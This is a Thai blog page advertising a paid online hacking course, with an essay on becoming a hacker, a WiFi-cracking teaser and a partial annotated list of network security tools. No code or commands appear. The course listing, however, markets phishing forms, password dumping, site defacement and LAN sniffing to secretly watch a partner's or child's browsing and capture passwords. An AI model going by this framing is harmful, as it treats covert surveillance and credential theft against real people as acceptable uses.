คอร์สเรียนแฮกเกอร์ Hacker&Security คนทำเว็บ/เรียนสายคอมห้ามพลาด

คอร์สเรียนแฮกเกอร์ออนไลน์ - แฮกเกอร์ & Security

########################################

ระยะเวลาการสอน ?

ไม่จำกัดว่ากี่ชั่วโมงหรือกี่วัน แต่จะสอนจนกว่าจะจบครับ

รูปแบบการสอน
คอร์สเรียนแบบออนไลน์
-สอนแบบ Step by step สมาชิกได้ลงมือทดลองด้วยตัวเอง
-เรียนผ่านแชท , Teamview หรือ โทรผ่านไลน์
-Teamview เพื่อแก้ปัญหา
ราคา 1500 บาท(รวมทุกหัวข้อ)

########################################

######หัวข้อที่สอนในคอร์ส######

++++[Web Application Penetration Testing]++++
หมวดนี้เรียนรู้เกี่ยวกับช่องโหว่ของเว็บไซต์ล้วนๆ
- เทคนิคการทดสอบแฮกช่องโหว่แบบ Manual - STEP BY STEP
- การใช้เครื่องมือทดสอบ
- ศึกษาโค้ดและการทำงานของช่องโหว่

#SQL Injection
#SQL Login Bypass
การโจมตีของแฮกเกอร์ที่สามารถแฮกข้อมูล ที่อยู่ภายในฐานข้อมูลของเว็บไซต์
#Bypass WAF (Web Application Firewalls)
#Blind SQL Injection

#[XSS] Cross Site Scripting
การโจมตีด้วยการใช้คำสั่งสคริปอันตรายต่างๆ
#Reflected Cross Site Scripting
#Cookie Steal
#Cross Site Request Forgery[CSRF]
File inclusion [RFI/LFI]

+++++++[ปูพื้น-เบสิก-แฮกเกอร์]+++++++
#Phishing
(User ทั่วๆไปมักจะโดนแฮก ID เกมส์  , โดนแฮก Email , โดนแฮก facebook กันบ่อยๆ)
และเทคนิคที่ User ทั่วไปมักหลงกล {Phishing} จนโดนแฮก
- พื้นฐานการสร้างฟอร์มรับข้อมูลหน้าเว็บเพื่อใช้เก็บข้อมูลต่างๆ
#รู้จักกับ Exploit
เรียนรู้กับช่องโหว่ของเว็บบอร์ดสำเร็จรูป Smf,discuz,phpbb,wordpress ลฯล ที่เคยถูกค้นพบ ,  ต่อยอดการเรียนรู้ ด้านช่องโหว่ รู้จักกับจุดอ่อนของเว็บไซต์
#วิธีการและการปลอมแปลง IP
ปลอม IP,Hide ip  Manual  & Tools และหลักการทำงาน
#Sniffer สืบบุคคลในวงแลน
สืบแฟนเข้าเว็บอะไร , ลูกชายเล่นคอมพ์ทั้งคืน อยากรู้ว่าเข้าเว็บอะไร
เข้าดูเว็บไหนตอนใช้คอมพ์  รวมไปถึง ดักรหัสผ่าน ภายในวงแลนและใน Wifi
Sniffer จะทำให้คุณเป็นแม่บ้านนักสืบและ พ่อบ้านนักสืบ ที่สังเกตุการคนทั้งบ้านในอย่างอยู่หมัด
-วิเคราะห์จุดให้สัญญาณ Wifi สารธารณะ
#รู้จักกับ Shell
อธิบายคุณสมบัติของ Shell และความสามารถในการใช้งานพร้อม Shell ตัวอย่าง
รู้จักกับ Shell และความอันตรายที่ใช้ในการควบคุมเว็บไซต์ต่างๆที่ แฮกเกอร์ สามารถเจาะเข้าไปได้
เช่น การแก้ไขหน้าเว็บไซต์(Deface) การ Dump password (ขโมย Password ในฐานข้อมูลของเว็บไซต์)

########################################

ติดต่อ Facebook Profile  :http://www.facebook.com/profile.php?id=100005505336690
Line & Tel.

==================================================================
Read more

อยากเป็น Hacker - แฮกเกอร์ ต้องทำอย่างไร ?

อธิบายเกี่ยวกับ HACKER - แฮกเกอร์

 สอนแฮกเกอร์ =  สอนให้รู้จักการแฮก ที่แท้จริงของแฮกเกอร์ 
และประยุกค์นำไปใช้ในทางที่ดี  ดีกว่าอ่อน SECURITY จนโดนเขาแฮก

เว็บนี้เกิดจากการใช้แนวคิดในแง่มุมตอนที่ผมเริ่มหัดเรียนรู้ในด้านนี้ใหม่ๆ (แฮกเกอร์) เป็นการเรียนรู้ด้วยตัวเอง และเดินไปในทางที่ผิดพลาด
(ผมเสียเวลากับการเรียนรู้ที่ผิดพลาดมานานกว่า 5  ปี)
ค้นหาแต่เพียงเครื่องมือที่นำมาซึ่งความสบาย

แต่ภายในเราไม่รู้อะไรเกี่ยวกับมันอย่างลึกซึ้งเลย
จากคนที่มีความคิดในทางลบ  จึงอยากดึงคนที่สนใจ แฮกเกอร์เหล่านี้
เพื่อปรับเปลี่ยนแนวคิด ในคำว่า แฮก
ของคนกลุ่มนี้ให้ไปทางที่เกิดประโยชน์ต่อไป

การสนใจ "แฮกเกอร์" ไม่ผิด

แต่บางครั้งการศึกษาแบบไม่มีผู้แนะนำนั้น
ทำให้ผู้เริ่มต้นใหม่ๆอาจสนใจผิดในสิ่งที่ผิดได้
เช่นการเปิด Google : ค้นหา โปรแกรมแฮกเฟสบุ๊ค , โปรแกรมแฮก...ลฯล
ถือเป็นการเสียเวลา,ไม่ได้ความรู้ แถมอาจได้ไวรัส ,ถูกขโมยข้อมูลได้แบบไม่รู้ตัว

แล้วจะเป็น "แฮกเกอร์" ควรจะอ่านเรื่องอะไร

ถ้าผมเจอคำถามนี้ ผมมักจะตอบกลับไปว่า...
คุณมีอะไรอยู่ในมือ ?
กับ ทำอะไรแล้วมีความสุข  ?

ความรู้ประเภทไหนที่มันเข้าหัวได้เรื่อยๆ โดยที่คุณไม่รู้สึกรำคาญ
นั่นแหละครับคือสิ่งที่คุณต้องพยายาม ทำมันให้เต็มที่

เพราะในที่สุดแล้วต่อให้คุณพยามเรียนรู้
โดยตั้งเป้าไว้ที่คำว่า HACK เพียงคำเดียว
คำตอบนั้นกว้างมาก..ผลลัพธ์ที่ออกมาก็คือความท้อแท้
จนทำให้คุณรู้สึกเบื่อ จนเลิกที่จะเรียนรู้ไปเลยก็ได้

คำถามข้างบนนี้ จะให้คำตอบได้ว่า
คุณควรจะเป็น หรือ จะเป็นอะไรได้บ้าง ?
ตอบคำถามตัวเองแล้วเริ่มศึกษากับสิ่งนั้นอย่างจริงจัง...

สิ่งที่ควรสนใจในเส้นทางของ แฮกเกอร์ นั้น
หลักๆจะมี 4 สายวิชาให้เลือกศึกษาคือ


[1] Programing
สายนี้ สำหรับคนชอบการเขียนโปรแกรม เพื่อใช้งานกับคอมพ์พิวเตอร์
หรืออาจจะรวมไปถึงการเขียน Mobile Application เพื่อใช้งานบนมือถือด้วย ลฯล
ซึ่งแฮกเกอร์ส่วนมากก็ต้องศึกษาโค้ดกันด้วย....เพื่อเข้าใจกับการทำงานของโปรแกรม

ยกตัวอย่าง การที่จะแฮกเว็บ ซักเว็บหนึ่ง ก็ต้องเรียนรู้ภาษาของเว็บ
และเรียนรู้การใช้งานของระบบจัดการฐานข้อมูลของเว็บๆนั้นด้วย ลฯล
หรืออีกด้านคือการเขียนเพื่อใช้งานเอง ซึ่งสายนี้ก็มักจะเรียนรู้คู่กับการ Reverse Engineering

[2] Reverse Engineering
สำหรับคนที่ชอบโปรแกรมเมอร์ก็สามารถเรียนรู้ในเรื่อง Reverse Engineering ได้
เพราะกลุ่มนี้จะยุ่งอยู่กับโค้ดเหมือนๆกัน เช่น ทำการ Crack โปรแกรมแก้ไขไฟล์ของโปรแกรมนั้นๆให้สามารถใช้งานได้โดยไม่จำกัดเวลา
หรือ เปิดฟังชั่น ของโปรแกรมฟรี หรือจะเป็นการทำ Decompiler
เพื่อดู Source Code ของโปรแกรม   ลฯล

[3] Forensics
สำหรับคนที่ชอบแนว นักสืบ ที่จะทำเกี่ยวกับ
การตรวจสอบ การเก็บหลักฐาน, การค้นหา, วิเคราะห์
และการนำเสนอหลักฐานทางดิจิตอล เช่น การตามจับ HACKER

[4] Pentester
คือกลุ่มแฮกเกอร์ที่ทำการทดสอบเจาะระบบต่างๆ
แยกออกหลักๆ 3 ประเภทดังนี้

Web Application Penetration Testing

การทดสอบความปลอดภัยของเว็บไซต์ หรือพูดง่ายๆคือการ ทดสอบแฮกเว็บ
แฮกเกอร์กลุ่มนี้อย่างน้อยๆจะต้องมีความรู้ในเรื่องภาษาที่ใช้เขียนเว็บไซต์
และการใช้งานระบบจัดการฐานข้อมูล คำสั่งในด้าน Os Command
ของเว็บไซต์ ที่ทำการทดสอบ ลฯล  ภาษาที่แนะนำเพื่อเริ่มต้นคือ PHP & Mysql
และทำการ Vulnerability Assessment เพื่อประเมิณความอันตรายของช่องโหว่นั้นๆ

Client-Side Penetration Testing

คือกลุ่มแฮกเกอร์ ที่ชอบทดสอบแฮก USER หรือแฮกผู้ใช้คอมพ์ทั่วไป
โดยอาศัย ช่องโหว่ของ Software,Web browsers, Media players  ลฯล

Network Penetration Testing

เปรียบเหมือนหน่วย ลาดตระเวน ในเครือข่ายทุกระดับ
เพราะจะทำการทดสอบในระบบ Network (เครือข่าย)
LAN (บ้าน) - MAN (หมู่บ้าน-ตำบล)- WAN(ประเทศ)

ระดับ LAN (เครือข่ายท้องถิ่นขนาดเล็ก)
ปัจจุบันเครือข่ายตามบ้านส่วนมากแล้วจะเป็น WLAN
หรือ Wireless Lan การโจมตีที่พบบ่อยๆคือ Sniffer (ดักอ่านข้อมูล)
นอกจากนี้ยังมี WMAN , WWAN

ต่อมาคือ MAN ตัวอย่างที่เราได้เห็นฮิตๆกันทั่วไปก็คือ
การใช้ AirCrack แฮกรหัส Wifi ถือเป็นการติดต่อกันของ 2 เครือข่าย LAN

หรือในระดับที่กว้างกว่านั่นคือ WAN
เช่นการทำ Vulnerability Scanning โดยใช้ Nessus หรือ Nikto
และทำ Exploitation of a Vulnerability โจมตีช่องโหว่โดยใช้  Metasploit
ลฯล

อธิบายคำว่า Network "Security"

อย่างแรกที่แนะนำให้ศึกษาถ้าอยากเป็น Networker Security ที่ดี คือ "(OSI Model) 7 Layer"
เรื่อง HACK ในคอมพ์ ก็กลายเป็นแค่ มายากล เล็กๆเท่านั้น
แต่สิ่งที่จะต้องศึกษากันมากกว่านั้นก็คือคำว่า "SECURITY"

คำว่า HACK และ SECURITY  ถ้าให้ตีความหมายออกมาให้เห็นภาพ ?

HACK = HACK
(ไม่ต้องรู้อะไรมาก รู้แค่วิธีการแฮกแค่นั้น)

SECURITY
เน้นการเรียนรู้หลักการทำงานของช่องโหว่
HACK ได้ (แค่บางคน) ( ในทางปฏิบัติคำตอบก็คือการ "PENTEST" )
รวมถึงสามารถป้องกันได้ (อย่างถูกวิธี)


สุดท้ายการเป็น  JubChai แปลเป็นไทยคือ "จับฉ่าย"
อาจจะไม่ใช่กลุ่มจำพวกคนที่มั่วซั่ว แต่อาจจะหมายถึงคนที่ศึกษามันซะทุกอย่าง
จนสามารถไปต่อได้ในทุกๆด้าน และการนำความรู้เหล่านี้มาปรับใช้เข้าด้วยกันได้
(แต่ก็มีทางลึกของตัวเองอยู่เพียงหนึ่ง) คือที่มาของคำว่า "แฮกเกอร์"

 ฝากถึง "แฮกเกอร์" หรือเด็กมหาลัยชาว it ทุกคนที่สนใจ

ความพยามในการเรียนรู้สำคัญมาก
เชื่อว่าหลายๆคนอ่านมาถึงจุดนี้แล้วเพราะความสนใจจริง
แต่ในทางปฏิบัติ ผมขอตั้งคำถามไว้ว่า
ถ้าคุณเปิดเจอเนื้อหาที่อ่านแล้วไม่เข้าใจ
คุณจะยอมเสียเวลานั่งเซิส Google กันมั้ยครับ ?

    ถ้ายอม = การเรียนรู้ก็ไปต่อ = บทความนี้เป็นผลสำเร็จ
ถ้าไม่....การเรียนรู้ก็จบลงแค่นั้น...
ความฝันอยากเป็น "Hacker" ก็ยังเลือนลางต่อไป

นอกซะจากการขอคำแนะนำจากผู้รู้ที่รู้จัก หรือใช้การเรียนรู้ที่เร็วคือการถาม
แต่ในวงการ HACK ถ้าไม่สนิทจริงคงไม่มีใครสอนกันง่ายๆแน่นอน
เพราะฉนั้นผมจึงเปิดคอร์สออนไลน์นี้ไว้เป็นทางเลือกสำหรับคนที่อยากเรียนรู้เร็ว

คอร์สเรียน แฮกเกอร์ & Security ออนไลน์
 http://basic-hack.blogspot.com/2014/06/hacker-4657.html


ท้ายสุด.....การเรียนรู้ด้วยตัวเอง (แสวงหา)

ฝึกเป็นนักแปล การฝึกแปล สำคัญมาก
ถึงแม้เด็กๆรุ่นหลังมีมากที่ไม่ชอบการเรียนรู้ภาษา
แต่เหตุผลที่ต้องแปลเพราะบทความในไทย
อาจไม่มีไอเดียร์ที่ดี ให้อ่านกันมากเท่าไหร่
เปิดเจอบทความ ภาษาอังกฤษ ที่น่าสนใจให้ลุยได้เลยครับ

ในทางตรงกันข้าม สำหรับความรู้เรื่องแฮกไม่ว่าบทความจะเป็นภาษาอะไร
ยิ่งบทความนั้นได้เขียนมาจากประเทศที่มีชื่อเสียงเลื่องนามในด้าน HACKER
ความรู้สึกอยากแปล ของผมจะมีมากขึ้น
และยิ่งอยากศึกษามาก เพราะเราสามารถนำมาทำความเข้าใจ...
ควบคู่กับบทความในไทยและตำราเรียนตามสาขาเราได้ไม่ยาก
บางครั้งถึงขั้นยอมนั่งแปลเป็นวันๆ เพื่อให้เข้าใจ (ไม่รู้ไม่เลิก)
เพราะชีวิตคือการเรียนรู้ เราจึงต้องแสวงหา และเรียนรู้กันต่อไป

" เรียนรู้ > เข้าใจ > ใช้ จินตนาการ สร้างไอเดีย"
แฮก


Read more

hack wifi - แฮกไวไฟ wpa2-psk ด้วย windows (ไม่ใช่ backtrack)

เพื่อง่ายต่อการทดลองกับ 2 คำถามคาใจบนโลกอินเตอร์เน็ต - Hack wifi , Hack wireless ที่เป็น WPA2-PSK ด้วย Windows

 Hack Wifi , Hack Wireless ไม่ใช่  backtrack OS
วิธีการทำบน Windows ในรูปแบบที่บุคคลทั่วๆไปได้เริ่มทดสอบ และทำความเข้าใจได้ง่ายขึ้น

############ Tools ############
- Elcomsoft Wireless Security Auditor
http://www.elcomsoft.com/ewsa.html


Read more

สุดยอด 49 เครื่องมือ ทางด้าน Network Security (ไม่ใช่โปรแกรมแฮก)

ไม่ใช่โปรแกรมแฮกของ "Hacker" , แฮกเกอร์
จุดประสงค์สำหรับผู้ที่ต้องการศึกษาช่องโหว่ของระบบ Network

แปะไว้สำหรับคนที่กำลังค้นหา โปรแกรมแฮก เฟสบุ๊ค , hotmail ลฯล
 Hack tools ต่างๆ  ลอง(ศึกษา) ของจริงกันดูครับ

#############################################################
.......วงการ Security มีเรื่องแปลกอย่างหนึ่ง ที่ยากจะหาได้ในสาขาอื่นๆ ของคอมพิวเตอร์ นั่นก็คือเรื่องของ HACKER

ผู้ดูแลระบบความปลอดภัย ที่ต่างก็ใช้ความรู้เดียวกัน เครื่องมือชุดเดียวกัน ในวัตถุประสงค์ที่แตกต่างกันอย่างสิ้นเชิง ฝ่ายหนึ่งใช้ความรู้และเครื่องมือเพื่อโจมตี แต่อีกฝ่ายใช้ความรู้และเครื่องมือเพื่อป้องกัน อาจเรียกได้ว่าเป็น "คนละด้านของดอลลาร์เดียวกัน" ในบทความนี้ผมจะแนะนำให้รู้จักกับเครื่องมือต่างๆ จำนวน 50 โปรแกรม บางโปรแกรมสามารถทำหน้าที่ได้ทั้งโจมตี(แฮก)และป้องกัน บางโปรแกรมก็เป็นโปรแกรมป้องกันเพียงอย่างเดียว

การจัดลำดับ 50 เครื่องมือนี้ ผมไม่ได้จัดเองหรอกครับ แต่เป็นการสำรวจของหน่วยงานที่ชื่อว่า InSecure.org ผู้สร้างโปรแกรม NMAP อันลือลั่น เป็นผู้จัดทำขึ้น โดยสอบถามจากผู้ที่มีอีเมล์อยู่ในลิสต์ (Mailing List) ของ InSecure.org ซึ่งถือว่าเป็นลิสต์ที่ครอบคลุมผู้ที่อยู่ในวงการ มากพอควร ดังนั้นการจัดอันดับนี้ จึงสมควรเชื่อถือได้ ในชุดโปรแกรมนี้ มีหลายๆ โปรแกรมที่สามารถนำไปใช้งานด้านมืดได้ แต่ก็สามารถนำไปใช้ประโยชน์ได้เช่นกัน เพราะการป้องกันที่ดีอย่างหนึ่ง ก็คือการทดลองโจมตีตัวเอง ดังนั้นรู้จักเครื่องมือเหล่านี้ไว้ ก็คงไม่เสียหลาย ก็ขอเริ่มเลยก็แล้วกันนะครับ โดยลำดับนี้จะเรียงตามความนิยมมากไปหาน้อยตามลำดับ

1) Nessus
เป็น เครื่องมือที่อยู่ในกลุ่ม Security Scanner แฮกเกอร์จะใช้สำหรับสแกนเครื่องคอมพิวเตอร์ผ่านระบบเครือข่าย เพื่อตรวจสอบหาจุดโหว่ของเครื่องเป้าหมาย แล้วรายงานให้ทราบ บางคนก็จะเรียกเครื่องมือประเภทนี้ว่า Remote Network Security Auditor สำหรับโปรแกรม Nessus นี้เป็นโปรแกรมที่ให้ดาวน์โหลดได้ฟรีครับ ไม่ต้องเสียเงินแต่อย่างใด โปรแกรม Nessus จะแบ่งส่วนการทำงานเป็น 2 ส่วน คือส่วนของเซิร์ฟเวอร์ซึ่งจะต้องทำงานกับ ระบบปฏิบัติการ ตระลยูนิกซ์ เช่น Linux หรือ FreeBSD และส่วนของ Client ที่ทำงานได้ทั้งบน Unix และ Windows ดังนั้นคนที่ไม่ถนัดยูนิกซ์ก็อาจจะไม่ถนัดโปรแกรมนี้ สำหรับการแสดงผลในส่วนของ Client สามารถแสดงผลในกราฟิกโหมดได้ เครื่องมือชุดนี้ถือว่าเป็นเครื่องมือที่มีประสิทธิภาพมากโปรแกรมหนึ่ง มีการอัพเดตฐานข้อมูล อย่างสม่ำเสมอ แถมยังฟรีอีกด้วย จึงเป็นโปรแกรมที่น่าใช้โปรแกรมหนึ่งที่อยากให้ผู้อ่านพิจารณา

2) Netcat
โปรแกรมนี้ได้ชื่อว่าเป็น "Swiss Army Knife" (ชุดเครื่องมืออเนกประสงค์ที่เรียกกันว่ามีดพับของสวิส) ของวงการ Security&Hacker โดยเป็นเครื่องมือที่ใช้ในการดักจับแพ็กเกตในเครือข่าย และสร้างแพ็กเกตเพื่อส่งเข้าไปในเครือข่าย การใช้งานสามารถใช้ได้ทั้งการเขียนโปรแกรมเพื่อเชื่อมต่อกับ Netcat และใช้ภาษาสคริปต์เพื่อสั่งงาน สามารถช่วยดีบั๊กการทำงานของเครือข่ายได้ ผู้ที่สนใจและศึกษาโพรโตคอล TCP/IP ไม่ควรพลาด โปรแกรม Netcat มีทั้งเวอร์ชันที่ทำงานกับระบบปฏิบัติการตระลยูนิกซ์ และระบบปฏิบัติการวินโดวส์ เครื่องมือนี้ฟรีอีกเช่นกันครับ

(Webmaster: สามารถทำหน้าที่เป็น Port scanner, Port Redirector รวมถึง Port Listenner ครับ)

3) Tcpdump
เครื่องมือ นี้จัดอยู่ในกลุ่ม Network Analyzer โดยมีความสามารถในการดักจับแพ็กเกต และ วิเคราะห์แพ็กเกตเพื่อตรวจสอบปัญหาที่เกิดขึ้นกับระบบเครือข่าย อันที่จริงเครื่องมือประเภทนี้มีอยู่มากมาย ทั้งแบบที่เสียเงินและแบบที่แจกฟรี หลายโปรแกรมมีความสามารถมากกว่าโปรแกรม Tcpdump ด้วยซ้ำไป แต่เหตุที่ Tcpdump ยังติดอันดับอยู่นั้น เนื่องจากโปรแกรมนี้เป็นโปรแกรมที่เกิดมาก่อน แถมยังแจกฟรีพร้อม Sourcecode มีการทำงานที่รวดเร็ว สามารถทำงานร่วมกับโปรแกรมอื่น และสามารถเป็นเครื่องมือให้โปรแกรมอื่นเรียกใช้ได้ ด้วยคุณสมบัติต่างๆ ที่กล่าวมา จึงทำให้ Tcpdump ได้รับเกียรติติดอันดับในครั้งนี้ด้วย โปรแกรม Tcpdump เป็นโปรแกรมที่ทำงานกับระบบยูนิกซ์ สำหรับตระลวินโดวส์นั้น มีผู้พอร์ตขึ้นมารันโดยใช้ชื่อว่า Windump ซึ่งก็ยังคงแจกฟรีพร้อมซอร์สโค้ดเหมือนกับบนยูนิกซ์

4) Snort
เครื่องมือที่อยู่ในกลุ่ม Network Intrusion Detection System (NIDS) ซึ่งทำหน้าที่ ตรวจจับการบุกรุกทางเครือข่าย ด้วยการดักจับข้อมูลที่วิ่งผ่านเครือข่าย แล้วตรวจสอบว่าแพ็กเกตที่วิ่งผ่านเครือข่ายนั้นมีลักษณะของการโจมตีหรือไม่ โปรแกรมนี้จะมีข้อดีที่ทำให้เราทราบถึงความพยายามในการโจมตี เพราะโดยทั่วไปเมื่อแฮ็กเกอร์จะโจมตีระบบ มักจะมีการสำรวจระบบก่อนจะเข้ามาโจมตีจริงๆ ซึ่งหากเราไม่ได้ติดตั้งโปรแกรมแบบนี้เอาไว้ เราก็จะไม่ทราบเลยว่ามีความพยายามที่จะทำเช่นนี้อยู่ เราอาจจะรู้อีกทีตอนที่เครื่องคอมพิวเตอร์ถูกแฮ็กไปเรียบร้อยแล้ว ดังนั้นโปรแกรมแบบนี้จะมีประโยชน์ในการแจ้งเตือน เมื่อมีความพยายามในการบุกรุกเกิดขึ้น เพื่อจะได้หาทางแก้ไข และป้องกันต่อไป โปรแกรม Snort เป็นโปรแกรมที่ทำงานได้ทั้งบนระบบ Unix และ Windows โปรแกรมนี้เป็นอีกโปรแกรมที่เก่ง ฟรี และแจก Sourcecode ด้วย

5) Saint
ย่อ มาจาก Security Administrator's Integrated Network Tool เป็นโปรแกรมที่อยู่ในกลุ่มของ Security Scanner โปรแกรมนี้พัฒนาขึ้นมาจาก SATAN ที่เป็นเวอร์ชันแจกฟรีมาเป็น Saint ซึ่งไม่ฟรีแล้ว โดยคิดเงินตามจำนวนเครื่องเช่น 845 ดอลลาร์สำหรับ 10 เครื่องแรก โปรแกรมนี้สามารถสแกนผ่านไฟร์วอลล์ได้ มีฐานข้อมูลสำหรับสแกนที่ทันสมัย และอัพเดตจากที่ต่างๆ เช่น CERT, CIAC มีการแสดงผลการทำงานผ่านเว็บ โปรแกรมนี้แม้จะไม่ฟรี แต่ก็ถือว่าราคาไม่แพง หากเทียบกับซอฟต์แวร์ของบริษัทชื่อดัง โดยสิ่งที่คุณจะได้จากซอฟต์แวร์ที่เสียเงิน คือได้คู่มือที่ดีกว่า ได้รับการสนับสนุนทางเทคนิค อ้อ! โปรแกรมนี้ได้รางวัล Information Security Excellence Award ประจำปี 2002 จากนิตยสาร Information Security ด้วยครับ


6) Ethereal
Network Analyzer ที่โดยส่วนตัวแล้ว ผมชอบโปรแกรมนี้มากกว่า Tcpdump เพราะมีความสามารถต่างๆ มากกว่า แต่ต้องทำงานแบบเดี่ยวๆ นะครับ เพราะทำงานร่วมกับโปรแกรมอื่นๆ แบบ Tcpdump ไม่ได้ โปรแกรมนี้มีทั้งที่ทำงานบน Unix และ Windows (และระบบปฏิบัติการอื่นๆ อีกมากมาย อาทิ บนเครื่องแมค) โปรแกรมนี้แจกฟรีพร้อมซอร์สโค้ดเช่นเดียวกัน


7) Whisker
โปรแกรม นี้จัดอยู่ในตระล Security Scanner คือสแกนหาจุดอ่อนของเครื่องคอมพิวเตอร์ จุดเด่นคือเขียนด้วยภาษา Perl จึงทำงานได้กับหลายระบบปฏิบัติการ แจกฟรีและมีซอร์สโค้ดให้ด้วยเช่นกัน

Cool Internet Security Scanner
โปรแกรม จากบริษัท ISS ซึ่งเป็นบริษัทที่ทำผลิตภัณฑ์ทางด้าน Security รายใหญ่ โปรแกรมนี้มีความสามารถมาก มีผู้ใช้งานมากมาย และมีราคาแพง (2,795 ดอลลาร์สำหรับ 30 เครื่อง) ผลิตภัณฑ์นี้มีตัวแทนจำหน่ายในประเทศไทย ซึ่งหากยอมเสียเงินก็จะได้รับความสะดวกในการใช้งาน เพราะจะมีการติดตั้ง อบรม และสนับสนุนในด้านต่างๆ ให้เหมาะสำหรับหน่วยงานขนาดใหญ่ที่มีงบประมาณทางด้าน Security เพียงพอ

Internet Security Scanner 
เป็นโปรแกรมที่มีความสามารถมาก มีผู้ใช้งานมากมาย 
และมีตัวแทนจำหน่ายในประเทศไทย

9) Abacus Portsentry
เครื่องมือนี้เป็นเครื่องมือที่แปลกตัวหนึ่ง คือกึ่งโปรแกรม Personal Firewall และ กึ่งโปรแกรมตรวจจับผู้บุกรุก เนื่องจากโปรแกรมนี้จะทำหน้าที่ตรวจจับ การ Scanport และ Block เครื่องที่เข้ามาสแกนพอร์ต ทำให้ไม่สามารถเข้ามา Scan port ได้อีกต่อไป แต่โปรแกรมนี้ไม่ได้ทำหน้าที่บล็อกการสื่อสารต่างๆ เช่นเดียวกับที่ Firewall ทำได้ แถมตรวจจับการบุกรุกด้วยวิธีอื่นไม่ได้ (ตรวจได้แค่การ Scanport เพียงอย่างเดียว)

อย่างไรก็ตามเครื่องมือนี้ จัดว่ามีประโยชน์ หากสามารถนำไปติดตั้งกับเครื่องคอมพิวเตอร์ได้ทุกเครื่อง เพราะแค่ป้องกัน Hacker ทำการ Scanport เพียงอย่างเดียว ระบบก็มีความปลอดภัยมากขึ้นแล้ว ซอฟต์แวร์นี้ปัจจุบันทำงานได้กับระบบปฏิบัติการตระล Unix โดยเน้นไปที่ Linux แต่คาดว่าน่าจะมีเวอร์ชันสำหรับ Windows ในอนาคต โปรแกรมนี้ปัจจุบันยังแจกฟรีอยู่ แต่อนาคตก็ไม่แน่ว่าจะฟรีหรือไม่

10) DSniff
เครื่องมือดักจับแพ็กเกตอีกตัวหนึ่ง นิยมในหมู่ Script kiddies(ไม่ใช่ Hacker) มีหลายโปรแกรมอยู่ในชุดเดียวกัน มีความสามารถในการดักจับกับเครือข่ายที่เป็น Switch ซึ่งโปรแกรมดักจับ Packet ทั่วไปดักจับไม่ได้ โปรแกรมนี้ทำงานได้กับตระล Unix เท่านั้น แน่นอนครับว่าแจกฟรี

(Webmaster: ถ้าเป็นการใช้ Hub เมื่อก่อนก็จะเป็นพวกโปรแกรม Sniffer ดักจับได้ครับ)

11) Tripwire
โปรแกรม ที่ทำหน้าที่ตรวจสอบความถูกต้องของ File และ Directory จุดประสงค์ของโปรแกรมประเภทนี้ คือป้องกันไม่ให้ Hacker นำโปรแกรมประเภทโทรจัน (Trojan) หรือโปรแกรมที่ไม่ได้รับอนุญาตมาปล่อยไว้ในระบบของเรา เพราะโปรแกรมนี้จะคอยตรวจสอบว่ามีผู้นำไฟล์ที่ไม่ผ่านระบบ Tripwire เข้ามาหรือไม่ ถ้ามีก็จะแจ้งเตือนให้ผู้ดูแลระบบตรวจสอบต่อไป โปรแกรมนี้ฟรีสำหรับ Linux แต่เสียเงินสำหรับระบบปฏิบัติการ Windows และโซลาริส (Solaris)

12) Cybercop Scanner
เครื่องมือตรวจหาจุดบกพร่องของคอมพิวเตอร์อีกตัวหนึ่ง ซอฟต์แวร์นี้ ขายในราคาแพง และไม่มีตัวแทนจำหน่ายในประเทศไทย จึงไม่น่าสนใจมากนัก

13) Hping2
โปรแกรม จำพวก Packet Assembly โดยสามารถจะประกอบแพ็กเกตประเภท ICMP, TCP และ UDP แล้วส่งไปยังเครื่องคอมพิวเตอร์เป้าหมายได้โดยไม่ต้องเขียนโปรแกรม ดังนั้นเราสามารถจะใช้โปรแกรม Hping2 นี้เพื่อทดสอบ Firewall สั่ง Scanport และทดสอบระบบเครือข่ายในรูปแบบต่างๆ สามารถส่งได้ทั้งแพ็กเกตแบบปกติ และในแบบที่เป็น Fragment เครื่องมือนี้ยังเหมาะสำหรับผู้ที่ต้องการศึกษาโพรโตคอล TCP/IP อย่างละเอียดด้วย มีใช้งานบนระบบปฏิบัติการตระลยูนิกซ์เท่านั้น แล้วก็ฟรีเช่นเคยครับ

14) SARA
ย่อมาจาก Security Auditor's Research Assistant เป็นเครื่องมืออีกตัวหนึ่งที่พัฒนาขึ้นมาจาก SATAN สำหรับสแกนเพื่อตรวจสอบข้อบกพร่อง โปรแกรมนี้แจกให้ใช้งานฟรี แต่มีเฉพาะบนระบบปฏิบัติการตระล Unix เท่านั้น

15) Sniffit
โปรแกรม ดักจับแพ็กเกต อีกตัวหนึ่ง สามารถดักจับแพ็กเกต TCP/UDP และ ICMP พร้อมทั้งให้รายละเอียดของข้อมูลใน Packet อย่างละเอียด จุดเด่นของโปรแกรมนี้ คือมีรายละเอียดของข้อมูลที่ค่อนข้างมาก สามารถแสดงผลลัพธ์ได้หลายรูปแบบ เหมาะสำหรับผู้ที่ต้องการวิเคราะห์เครือข่ายแบบละเอียด โปรแกรมนี้แจกให้ใช้งานฟรี แต่มีเฉพาะบนระบบปฏิบัติการตระล Unix เท่านั้น

16) SATAN
ย่อ มาจาก Security Auditing Tool for Analyzing Networks ต้นตระลของ โปรแกรมตรวจสอบข้อบกพร่องในคอมพิวเตอร์ และ ถือเป็นตำนานบทหนึ่งของวงการ Security เนื่องจากเป็นเครื่องมือที่ออกมาก่อนใคร มีการทำงานที่เก่งกาจ (ในสมัยนั้น) จึงเป็นเครื่องมือที่มีผู้ใช้งานมาก ปัจจุบันมีหลายโปรแกรมที่พัฒนามาจาก SATAN และหลายโปรแกรมทำได้ดีกว่า แถมยังมีซอฟต์แวร์เชิงพาณิชย์ที่มีความสามารถหลากหลายกว่า ทำให้ SATAN ไม่เป็นที่นิยมเหมือนในอดีต โปรแกรมนี้แจกให้ใช้งานฟรี แต่มีเฉพาะบนระบบปฏิบัติการตระล Unix เท่านั้น


17) IPFilter
Firewall ที่ทำงานบนระบบปฏิบัติการ ตระล Unix ในลักษณะแบบ Packet Filtering (ยังไม่สามารถทำงานแบบ Statefule Inspection ได้) Firewall นี้หากจะเทียบกับFirewall ที่เป็นซอฟต์แวร์เชิงพาณิชย ์คงเทียบไม่ได้ แต่ข้อดีของ Firewall ตัวนี้ คือฟรีพร้อมทั้ง Sourcecode ด้วย

18) iptables/netfilter/ipchains/ipfwadm
โปรแกรม Firewall อีกตัวหนึ่งที่ทำงานบนระบบปฏิบัติการตระล Unix การทำงานของ Firewall นี้เป็นเพียงแบบ Packet Filtering เท่านั้น ไม่สามารถทำงานแบบ Statefule Inspection ได้ Firewall นี้แจกฟรีพร้อมทั้ง Sourcecode เช่นเดียวกัน

19) Firewalk
